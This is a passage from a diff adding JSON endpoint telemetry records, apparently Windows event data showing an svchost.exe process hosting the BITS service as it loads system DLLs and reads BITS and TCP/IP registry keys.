+ "event_type": "image_load", + "image_name": "ucrtbase.dll", + 
"image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", 
+ "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "qmgr.dll", + "image_path": "C:\\Windows\\System32\\qmgr.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\System32\\powrprof.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": 
"C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "bitsperf.dll", + "image_path": "C:\\Windows\\System32\\bitsperf.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "xmllite.dll", + "image_path": "C:\\Windows\\System32\\xmllite.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "FirewallAPI.dll", + "image_path": "C:\\Windows\\System32\\FirewallAPI.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "esent.dll", + "image_path": "C:\\Windows\\System32\\esent.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "fwbase.dll", + "image_path": "C:\\Windows\\System32\\fwbase.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, 
+ "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "wldp.dll", + "image_path": "C:\\Windows\\System32\\wldp.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "crypt32.dll", + "image_path": "C:\\Windows\\System32\\crypt32.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "msasn1.dll", + "image_path": "C:\\Windows\\System32\\msasn1.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "wintrust.dll", + "image_path": "C:\\Windows\\System32\\wintrust.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "registry", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", + "registry_value": "BITS", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "registry", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS\\PerfMMFileName", + "registry_value": "PerfMMFileName", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "ntmarta.dll", + "image_path": "C:\\Windows\\System32\\ntmarta.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + "image_path": "C:\\Windows\\System32\\profapi.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "registry", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", + "registry_value": "BITS", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "registry", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\BITS", + "registry_value": "BITS", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "clbcatq.dll", + "image_path": "C:\\Windows\\System32\\clbcatq.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + 
"event_type": "image_load", + "image_name": "FlightSettings.dll", + "image_path": "C:\\Windows\\System32\\FlightSettings.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "cryptsp.dll", + "image_path": "C:\\Windows\\System32\\cryptsp.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "bcd.dll", + "image_path": "C:\\Windows\\System32\\bcd.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "winhttp.dll", + "image_path": "C:\\Windows\\System32\\winhttp.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "policymanager.dll", + 
"image_path": "C:\\Windows\\System32\\policymanager.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "msvcp110_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp110_win.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "netprofm.dll", + "image_path": "C:\\Windows\\System32\\netprofm.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "npmproxy.dll", + "image_path": "C:\\Windows\\System32\\npmproxy.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "bitsigd.dll", + "image_path": "C:\\Windows\\System32\\bitsigd.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573457140000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "upnp.dll", + "image_path": "C:\\Windows\\System32\\upnp.dll", + "pid": 6868, 
+ "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573457140000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "ssdpapi.dll", + "image_path": "C:\\Windows\\System32\\ssdpapi.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573457290000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573457290000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "urlmon.dll", + "image_path": "C:\\Windows\\System32\\urlmon.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573457290000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "windows.storage.dll", + "image_path": "C:\\Windows\\System32\\windows.storage.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573457290000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573457290000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "iertutil.dll", + "image_path": "C:\\Windows\\System32\\iertutil.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": 
"C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573457290000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\System32\\fltLib.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573457290000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "cryptbase.dll", + "image_path": "C:\\Windows\\System32\\cryptbase.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573457290000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "sxs.dll", + "image_path": "C:\\Windows\\System32\\sxs.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573457290000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "registry", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", + "registry_value": "BITS", + "timestamp": 131883573457290000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "registry", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\BITS", + "registry_value": "BITS", + "timestamp": 131883573457290000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "AppXDeploymentClient.dll", + "image_path": 
"C:\\Windows\\System32\\AppXDeploymentClient.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573457290000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "StateRepository.Core.dll", + "image_path": "C:\\Windows\\System32\\StateRepository.Core.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573457290000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\BITS", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\BITS\\Start", + "registry_value": "Start", + "timestamp": 131883573457290000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "image_load", + "image_name": "Windows.Storage.OneCore.dll", + "image_path": "C:\\Windows\\System32\\Windows.Storage.OneCore.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573457290000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "WsmAuto.dll", + "image_path": "C:\\Windows\\System32\\WsmAuto.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458080000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "miutils.dll", + "image_path": "C:\\Windows\\System32\\miutils.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458080000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, 
+ { + "event_type": "image_load", + "image_name": "WsmSvc.dll", + "image_path": "C:\\Windows\\System32\\WsmSvc.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458080000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "dsrole.dll", + "image_path": "C:\\Windows\\System32\\dsrole.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458080000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "pcwum.dll", + "image_path": "C:\\Windows\\System32\\pcwum.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458080000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "mi.dll", + "image_path": "C:\\Windows\\System32\\mi.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458080000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "userenv.dll", + "image_path": "C:\\Windows\\System32\\userenv.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458080000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "gpapi.dll", + "image_path": "C:\\Windows\\System32\\gpapi.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458080000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "wkscli.dll", + "image_path": 
"C:\\Windows\\System32\\wkscli.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458080000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458080000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "netutils.dll", + "image_path": "C:\\Windows\\System32\\netutils.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458080000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\System32\\sspicli.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458080000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "OnDemandConnRouteHelper.dll", + "image_path": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458080000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "registry", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", + "registry_value": "Connections", + "timestamp": 131883573458080000, + "unique_pid": 
"{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "webio.dll", + "image_path": "C:\\Windows\\System32\\webio.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458230000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458230000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458230000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458230000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "dnsapi.dll", + "image_path": "C:\\Windows\\System32\\dnsapi.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458230000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "registry", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573458230000, + 
"unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "registry", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573458230000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "registry", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573458230000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "registry", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573458230000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "registry", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573458230000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "FWPUCLNT.DLL", + "image_path": "C:\\Windows\\System32\\FWPUCLNT.DLL", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458230000, 
+ "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "rasadhlp.dll", + "image_path": "C:\\Windows\\System32\\rasadhlp.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458230000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "usermgrcli.dll", + "image_path": "C:\\Windows\\System32\\usermgrcli.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573478860000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "ExecModelClient.dll", + "image_path": "C:\\Windows\\System32\\ExecModelClient.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573478860000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "propsys.dll", + "image_path": "C:\\Windows\\System32\\propsys.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573478860000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "CoreMessaging.dll", + "image_path": "C:\\Windows\\System32\\CoreMessaging.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 